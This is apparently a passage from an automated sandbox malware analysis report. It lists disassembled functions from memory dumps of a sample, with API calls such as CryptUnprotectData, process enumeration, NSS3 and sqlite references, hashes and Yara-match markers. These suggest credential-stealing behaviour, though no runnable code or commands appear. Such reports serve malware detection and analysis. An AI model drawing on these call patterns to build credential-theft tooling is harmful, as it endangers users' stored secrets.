Part of subcall function 6CFAD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6CFAD07B
Part of subcall function 6CFAD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6CFAD08E
Part of subcall function 6CFAD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFAD09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFA9F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6CFA9F59

Part of subcall function 6CFA9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CFA9C5B), ref: 6CFA9D82
Part of subcall function 6CFA9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CFA9C5B), ref: 6CFA9DA9
Part of subcall function 6CFA9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CFA9C5B), ref: 6CFA9DCE
Part of subcall function 6CFA9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CFA9C5B), ref: 6CFA9E43

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: 0f41bcd593daf7ed119e54e6e5da7ef48e9487fe51840012e0ab23221f76ae31
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: 5A112EB9F04201DBF7009AE59C0079BF7A4AF9834CF154135E91A8B740FF62E6568391

Function 004072A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55

Function 00419790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
CloseHandle.KERNEL32(00420ACE), ref: 0041980A

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61

Function 6D05CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D05D086
PR_Malloc.NSS3(00000001), ref: 6D05D0B9
PR_Free.NSS3(?), ref: 6D05D138

Strings

>, xrefs: 6D05CF5B

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: f6e8aa1f3c3a57dbc5a5d2cc944c36144ce75c6e820769e826cd525aea4a3628
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 91D17D26B406470BFB15487D8EA13EE779397C2370F98432ADD219B3E5E519C8A3C369

Function 6CFFAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf383c6d080a314e1a1b1c197d6a35e59c9f4aab11a5945cf32e2ed070303d9
Instruction ID: 2030d45ca7842d0aa7d0d4dc7ab58efb3fd67aabc6f70a3ec4e23d4351876e1f
Opcode Fuzzy Hash: 9cf383c6d080a314e1a1b1c197d6a35e59c9f4aab11a5945cf32e2ed070303d9
Instruction Fuzzy Hash: 65F11771E022158FEB04CF28D9507AE77F4FB8A308F18562DD925DB764EB709992CB81

Function 00419030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9

Function 6CEF3EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_, xrefs: 6CEF3FAA, 6CEF4185
sqlite_master, xrefs: 6CEF463F
sqlite_temp_master, xrefs: 6CEF460F

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: 76cbc31f7210310eef5131fb57e783ce408dfd06f37c303d6d14b04c2857e977
Instruction ID: 36050ab10b3985daf9693310b6604da6ac8920a3f1db441a10760a6df3da7361
Opcode Fuzzy Hash: 76cbc31f7210310eef5131fb57e783ce408dfd06f37c303d6d14b04c2857e977
Instruction Fuzzy Hash: 8E227A2164919A4FE7058B2982606B77FF6AF4730CB7C45AAC9F15FB52C725E843C780

Function 6CEC3D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6CEC3EA9

Strings

0, xrefs: 6CEC3DAB

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: ba333fd203ccf5e800f7bb29bd772faec27fefe2b42329ee8f1b329e6d4e6efb
Instruction ID: f3991badab42b2e6e980659888617c6e69816fe8ef9e8a7f5af7ee267b62cf4d
Opcode Fuzzy Hash: ba333fd203ccf5e800f7bb29bd772faec27fefe2b42329ee8f1b329e6d4e6efb
Instruction Fuzzy Hash: C7512831F492798EEB15867D89603FFBBB19B87318F394329C5B267BC0C22445468792

Function 6CEDAC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CEDAE9F
winUnlock, xrefs: 6CEDAE18

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 2ab54ec04608b4c6e1fc7be3647249080658a8d8bf4f9048619d87436ca5b6c8
Instruction ID: 358580a3bd4f814174535114a52d41f096dc94287b59aeb12aea094e533628ba
Opcode Fuzzy Hash: 2ab54ec04608b4c6e1fc7be3647249080658a8d8bf4f9048619d87436ca5b6c8
Instruction Fuzzy Hash: 7A718071608241AFDB04CF28D894BAABBF5FF89314F15C61DF9499B241D730EA86CB91

Function 6CF9ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CF9EE3D

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 53a179383c5ba9351875cd26f857e9aa2d9373ee61e549051d7c82d649411a74
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 2171C472E017018BEB18CF59D8806ABB7F2BBD8308F15462ED85697B91D770E941CB91

Function 6CED4DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CED5125

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: d0ebdbb27c2edf4a7df61ed608d8c0b9beb7a95d66c50c389d0b0dd3e4b739c8
Instruction ID: b9ece90592ca9a7aac08da471ee9ae5ec9257eec2cbef9c5990f80d4a9a7888f
Opcode Fuzzy Hash: d0ebdbb27c2edf4a7df61ed608d8c0b9beb7a95d66c50c389d0b0dd3e4b739c8
Instruction Fuzzy Hash: C3E12CB49093409FDB04DF28D58475ABBF0FF8A308F15961DE8899B351EB30E985CB82

Function 00418CF0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetSystemTime.KERNEL32(?,02D21940,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID:
API String ID: 62757014-0
Opcode ID: 1f5e7c6b0bc9bfca4dd1c417a573bf06a73b3ed23976cac32d28829f0085d365
Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
Opcode Fuzzy Hash: 1f5e7c6b0bc9bfca4dd1c417a573bf06a73b3ed23976cac32d28829f0085d365
Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6

Function 0041D21A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529

Function 6D00DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f98b7c906d3dedb5f2143111186bc57381ce601d3e6e13d35e5c318e97dc242b
Instruction ID: 512d1bd3cc7966b1a83ae55cad9387197587a357c5775692682eed181cad3353
Opcode Fuzzy Hash: f98b7c906d3dedb5f2143111186bc57381ce601d3e6e13d35e5c318e97dc242b
Instruction Fuzzy Hash: 28F13A75A00205DFEB08CF19D494BAE77B2BF89314F198069D819AF351DB35ED82CBA1

Function 6CFA1DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: d0b8aa0f2f4048cef599a2399017052beb37df58a958e497d3205eb3dac74570
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: A6D13C73A04655CBEB118E59C8843DAB763AB85328F5E8329DC681B7C6C377A907C7D0

Function 6CF38EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8848ba6c6bf95a52da92e5ab5bfd17cee23477c80e1bcc7f78f23e458a9768b6
Instruction ID: 50359fcfa9bfa1d3ae61ae44854c634c7f8faeb9ce6929f0cb5e38805495defd
